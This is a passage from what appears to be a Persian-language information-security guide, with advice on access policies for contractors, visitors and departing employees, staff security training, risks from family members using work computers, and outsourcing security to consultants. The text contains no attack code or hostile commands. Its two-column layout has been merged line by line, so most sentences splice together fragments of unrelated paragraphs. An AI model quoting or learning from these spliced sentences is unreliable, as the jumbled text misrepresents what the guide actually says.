ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺮﻛﺖ ﺑﻌﺪ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻠﻲ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ )ﻣـﺜ ﹰ
ﻼ
ﺷﻤﺎ ﺩﺍﺭﺩ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﻴﺪ .ﺑﺎﺯﺩﻳﺪﻛﻨﻨـﺪﮔﺎﻥ ،ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺍﺳـﺎﺗﻴﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﺍﺩﺍﺭﺍﺕ ﻧﻴـﺰ ﺍﮔـﺮ ﻳﻜـﻲ ﺍﺯ
ﺗﻌﻤﻴﺮﺍﺕ ،ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ،ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ،ﻭ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﻫﻤﮕﻲ ﻣﻤﻜﻦ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺳﻔﺮ ﺑﺎﺷﺪ ﻳﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﻴﻤﺎﺭﻱ ﻏﻴﺒﺖ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ
ﺍﺳﺖ ﺑﻪ ﺩﻓﺘﺮ ﻛﺎﺭ ﻭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻣﻮﻗﺘﻲ ﻳﺎ ﻧﻴﻤﻪﺩﺍﺋﻤﻲ )ﺍﻟﺒﺘﻪ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﺭﻭﺯ( ،ﺣـﺴﺎﺑﻬﺎﻱ ﺍﻭ ﻧﺒﺎﻳـﺪ ﻣـﺴﺪﻭﺩ ﻭ ﺭﻣﺰﻫـﺎﻱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺑﺒﻴﻨﻴﺪ ﻫﻤﺔ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗـﺮﺍﺭ ﻋﺒﻮﺭﺵ ﻧﺒﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ.
ﺩﺍﺩﻩﺍﻳﻢ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ ﺻـﺪﻕ ﻛﻨﻨـﺪ .ﺩﺭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﻗﻊ ﺗـﺮﻙ ﺷـﻐﻞ ﺑـﺴﻴﺎﺭ ﻧﺎﮔﻬـﺎﻧﻲ ﻭ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ
ﭘﺎﻳــﺎﻥ ﺍﺯ ﻳــﺎﺩ ﻧﺒﺮﻳــﺪ ﻛــﻪ ﻫــﻴﭽﻜﺲ ﺍﺯ ﺑﻴــﺮﻭﻥ ﺍﺩﺍﺭﻩ ﻧﺒﺎﻳــﺪ ﺑــﻪ ﺍﺳــﺖ .ﺩﺭ ﺍﻳــﻦ ﺷــﺮﺍﻳﻂ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻓــﺮﺩﻱ ﺩﺭ ﻣﺤــﻞ ﻛــﺎ ﹺﺭ
ﻲ ﻧﺎﻣﺤﺪﻭﺩ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜ ﹺ ﻛﺎﺭﻣﻨﺪﻱ ﻛﻪ ﺗﺮﻙ ﺷﻐﻞ ﻛﺮﺩﻩ ﺣﺎﺿﺮ ﺷﻮﺩ ﺗﺎ ﺍﺯ ﺗﻌﻮﻳﺾ ﻗﻔﻠﻬـﺎ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﺪ ﻭ ﻳﻚ ﻣﺄﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺟﻌﺒﻪﺍﻱ ﺣﺎﻭﻱ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺳﻮﺍﺑﻖ ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻭﺳﺎﻳﻞ ﺷﺨﺼﻲ ﻭﻱ ﻛﻪ ﺩﺍﺧﻞ ﻛﺸﻮﻱ ﻣﻴﺰ ﻛﺎﺭﺵ ﺑﻮﺩﻩﺍﻧـﺪ ﺑـﻪ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﻼ ﺣـﺬﻑ ﺷـﺪﻩ ،ﺗﻤـﺎﻣﻲ ﺑﺪﺭﻗﺔ ﺍﻭ ﺑﺮﻭﺩ .ﺣﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺍﻭ ﻗـﺒ ﹰ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ ،ﻭ ﺗﻠﻔﻨﻬﺎﻱ ﺩﻓﺘﺮ ﻭﻱ ﻧﻴـﺰ
ﻣﺘﺼﺪﻳﺎﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ؛ •
ﺩﻳﮕﺮ ﻭﺻﻞ ﻧﻴﺴﺘﻨﺪ .ﺍﻳﻦ ﺷﻜﻞ ﻣـﺪﻳﺮﻳﺖ ﺟـﺪﺍﺋﻲ ٩٩ﺩﺭ ﺻـﻨﺎﻳﻊ
ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﻮﻗﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳـﻲ •
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺴﻴﺎﺭ ﻣﻌﻤﻮﻝ ﺍﺳﺖ ﻭ ﺑﺨﺸﻲ ﺍﺯ ﻣﺸﺎﻏﻞ ﺳـﺎﺯﻣﺎﻥ
ﺩﺍﺭﻧﺪ؛
ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻧﻲ ﻫـﺴﺘﻨﺪﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ .ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺑﺨﺶ ﻣﻌﻤﻮ ﹰ
ﭘﺮﺳﻨﻞ ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﻧﻈﺎﻓﺖ؛ •
ﻛﻪ ﺍﺯ ﺭﻭﻱ ﻣﻴﻞ ﺧﻮﺩﺷﺎﻥ ﻭ ﺑﺮ ﺣـﺴﺐ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻳﻲ ﺍﺳـﺘﺨﺪﺍﻡ
ﻧﮕﻬﺒﺎﻧﺎﻥ ﺍﻣﻨﻴﺘﻲ؛ •
ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﻛﺮ ﺷﺪﻩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺴﺌﻮﻝ ﺍﻧﺠـﺎﻡ
ﻧﺎﻣﻪﺭﺳﺎﻧﻬﺎ ﻭ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﺗﺪﺍﺭﻛﺎﺕ ﻛﻪ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ •
ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺷﻮﻧﺪ .ﺗﺤﺖ ﻫﺮ ﺷﺮﺍﻳﻄﻲ ﺍﺯ ﺩﺍﻧﺶ ﻋﺮﻓﻲ ﺧـﻮﺩ
ﺩﺳﺘﺮﺳﻲ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﺍﺭﻧﺪ؛
ﻣﺸﺎﻭﺭﺍﻥ؛ •
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﻗﻴﻘﹰﺎ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﺩﺳﺘﺮﺳﻲ
ﺑﺎﻳﺪ ﭼﻪ ﺑﺎﺷﺪ ﻭ ﺁﻧﺮﺍ ﺑﻮﺿﻮﺡ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻓﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺩﺭ
ﺣﺴﺎﺑﺮﺳﺎﻥ ،ﻣﻤﻴﺰﻫﺎ ،ﻭ ﺳﺎﻳﺮ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﻣﺎﻟﻲ. •
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻴﺎﻥ ﻛﻨﻴﺪ.
ﺗﻤﺎﻣﻲ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧـﺪ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺍﻣﻨﻴﺖ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ ﺧـﺴﺎﺭﺗﻬﺎ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﻛﻨﺎﻥ
ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻳﺸﺎﻥ ﺗﻜﺮﺍﺭ ﺷﻮﺩ .ﭘﺮﺳـﻨﻞ
ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ ﻧﻴـﺰ
ﻫﻤﻮﺍﺭﻩ ﻣﻨﺎﻓﻊ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳـﺎ ﺑـﻪ
ﺟﺮﻳﻤﻪﻫﺎﻱ ﻧﻘﺾ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ
ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﺧﺎﻧﻮﺍﺩﺓ ﺧﻮﺩﺗﺎﻥ ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺍﺯ ﺩﻫﻨﺪ .ﮔﺰﺍﺭﺷـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ ﺍﺗﻔﺎﻗـﺎﺗﻲ ﺩﺭ
ﻳﺎﺩ ﻧﺒﺮﻳﺪ .ﺧﻮﺍﻩ ﺩﺭ ﻣﻨﺰﻝ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ ﻣﺤﻴﻄﻬﺎﻱ ﺧـﺎﻧﻮﺍﺩﮔﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﻫﻤﺒﺎﺯﻳﻬـﺎﻱ ﻛﻮﺩﻛـﺎﻥ ﻛـﻪ
ﺍﻋﻀﺎﻱ ﺧﺎﻧﻮﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺧﻮﺍﻩ ﻛﻮﺩﻛﺎﻧﺘﺎﻥ ﺭﺍ ﮔﻬﮕﺎﻩ ﺑﺮﺍﻱ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﺮﺩﻩﺍﻧـﺪ ﻭ ﻳـﺎ ﺍﻓـﺮﺍﺩ
ﺑﺎﺯﺩﻳﺪ ﺑﻪ ﺍﺩﺍﺭﻩ ﺑﺒﺮﻳﺪ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺁﻧﻬـﺎ ﻣﺘﺄﻫﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭ ﺁﮔـﺎﻩ ﺷـﺪﻥ ﺍﺯ ﺧﻴﺎﻧـﺖ
ﺑﺪﺍﻧﻨﺪ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻱ
ﻧﻴﺴﺖ .ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﺑﻪ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻭ ﻭﺳﺎﻳﻞ ﺣﺴﺎﺱ
99 Separation Management
١٦٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ،ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺿﻌﻴﻒ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺷﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺐ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴـﺖ
ﻭﺿﻌﻴﺖ ﺍﻳﻦ ﺷﺎﺧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑـﺎ ﻳـﻚ ﻧﮕـﺎﻩ ﺫﻛﺮ ﺷﺪﻩ ﻭ ﻳﻚ ﺩﺳـﺘﻪ ﺳـﺆﺍﻻﺕ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ ﻧﻬـﺎﻳﻲ ﻛـﺮﺩﻥ
ﺿﻌﻒ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺗـﺎﺯﻩﻛـﺎﺭ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ ﺭﺍ ﻣﺬﺍﻛﺮﺍﺕ ﺑﺎ ﺷﺮﻛﺎﻱ ﺟﺪﻳﺪ ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳـﺦ ﺩﺍﺩ
ﺗﺸﺨﻴﺺ ﺩﺍﺩ. ﻧﻴﺰ ﻋﻨﻮﺍﻥ ﺷﺪﻩﺍﻧﺪ.
ﺍﮔﺮ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑﺨـﺸﻲ ﻣﺨـﺼﻮﺹ ﺗﻬﻴـﺔ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ؛ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻫﻨﻮﺯ ﻧﺘﻮﺍﻧﺴﺘﻪﺍﻳﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎﻱ
ﻭﺭﻭﺩ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﺮﺻﻪﻫﺎﻱ ﺟﺪﻳﺪ
ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻛﻨﻴـﺪ،
ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺳـﺎﺯﻣﺎﻧﻲ ﺑﻌﺪ ﺍﺯ ﻣﻄﺎﻟﻌﺔ ﻫﻤﺔ ﻣﻄﺎﻟـﺐ ﻓـﺼﻠﻬﺎﻱ ﮔﺬﺷـﺘﻪ ﺷـﺎﻳﺪ ﺑـﻪ ﺍﻳـﻦ
ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ .ﭼﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎ ﺩﺭ ﻭﺿـﻌﻴﺖ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻓﻨـﺎﻭﺭﻱ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ؛ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﻨﻮﺯ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ
ﺍﻃﻼﻋﺎﺕ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﺍﮔـﺮ ﭼﻨـﻴﻦ ﺗﺨﺼـﺼﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؛ ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺣﺠﻢ ﻛﻞ ﻛـﺎﺭ ﺗﺮﺳـﻴﺪﻩ ﺑﺎﺷـﻴﺪ.
ﺑﺎﺷﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻛﻮﺗـﺎﻩﻣـﺪﺕ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ ﺍﮔﺮ ﺟﺰﺀ ﺩﺳﺘﻪ ﺁﺧﺮ ﻫﺴﺘﻴﺪ ﺍﻳﻦ ﺗﺼﻮﺭ ﺭﺍ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻧﺠـﺎﻡﺷـﺪﻥ
ﭘﻲﺭﻳﺰﻱ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺑﻠﻨﺪﻣﺪﺕﺗﺮ )ﺁﻣﻮﺯﺵ ﻭ ﻛﺴﺐ ﺁﮔﺎﻫﻲ( ﺑـﺴﻴﺎﺭ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥﻧﺎﭘـﺬﻳﺮ ﺍﺳـﺖ .ﺭﺍﻫﻬـﺎﻱ
ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﺪ. ﺩﻳﮕﺮﻱ ﻫﻢ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ،ﻣﺸﺎﻭﺭﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ
ﺗﺪﻭﻳﻦ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ ﺧﺎﺭﺝ ﺍﺯ ﺷﺮﻛﺖ .ﺣﺘﻲ ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﺗﺠﺎﺭﺕ ﺍﻧﻔـﺮﺍﺩﻱ ﻛﻮﭼـﻚ
ﺍﻭﻟﻴﻦ ﻗﺪﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺧـﺪﻣﺎﺗﻲ ﺩﺭ ﻣﻨﺰﻝ ﻳﺎ ﺷﺮﻛﺘﻲ ﻛﻮﭼﻚ ﻛﻪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ: ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﻨﺎﻓﻊ ﺗﻘﺴﻴﻢ ﺗﺠـﺎﺭﺏ
ﺗﺨﺼﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ :ﻋﻘﺪ ﻗـﺮﺍﺭﺩﺍﺩ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ
ﺷﺮﻛﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ ﮔـﺮﻭﻩ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ
۱۰۱ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﻛﻤﺒﻮﺩ ﻣﺘﺨﺼﺺ ﺁﻣﻮﺯﺵﺩﻳﺪﺓ ﺍﻣﻨﻴﺖ ،ﻛﻤﺒﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺑﺎﺗﺠﺮﺑﻪ ﻛﻪ ﺑﻪ ﻫﻴﭻ ﺍﺩﺍﺭﻩﺍﻱ ﻭﺍﺑﺴﺘﻪ ﻧﻴﺴﺘﻨﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻛﻨﻨـﺪ ﻭ
ﻣﻨﺎﺑﻊ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺗﺤـﺼﻴﻼﺕ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﺍﻛـﺰ ﺁﻣﻮﺯﺷـﻲ ﻭ
ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻳــﺸﺎﻥ ﺭﺍ ﺑــﺎ ﻣــﺸﺘﺮﻳﺎﻥ ﻣﺘﻘﺎﺿــﻲ ﺗﻘــﺴﻴﻢ ﻧﻤﺎﻳﻨــﺪ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺍﺳﺖ .ﺩﻭﻟﺘﻬﺎ ﻭ ﺻﻨﺎﻳﻊ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﺍﺯ
ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﺗﺨﺼﻴﺺ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻛﻤـﻚ
ﺑﻪ ﺳﺎﺧﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪ ﺷﺪﺕ ﺷﻜﺴﺖ ﺧﻮﺭﺩﻩﺍﻧﺪ. ۱۰۰ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ )(Outsourcing
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٦٨
ﻛﺮﺩﻩﺍﻧـﺪ ،ﻳـﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ ﺩﺭ ﻣﻘـﺎﻻﺕ ﺧﺒـﺮﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻣﻄـﺎﻟﺒﻲ ﺁﻳــﺎ ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﺧــﻮﺩ ﻭ ﺑــﺎ
ﺧﻮﺍﻧﺪﻩﺍﻧﺪ ،ﻭ ﻳﺎ ﭘﺲ ﺍﺯ ﻳﻚ ﺗﻤﺎﺱ ﺳﺎﺩﺓ ﺗﻠﻔﻨﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻴﺪ؟
ﻭﺍﺳﻄﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻧﺎﻥ ﮔﺮﻓﺘﻪﺍﻧﺪ. ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﻓﻘﻂ ﺑﻪ ﻣﺸﺎﻭﺭﺍﻧﻲ ﻧﻴﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
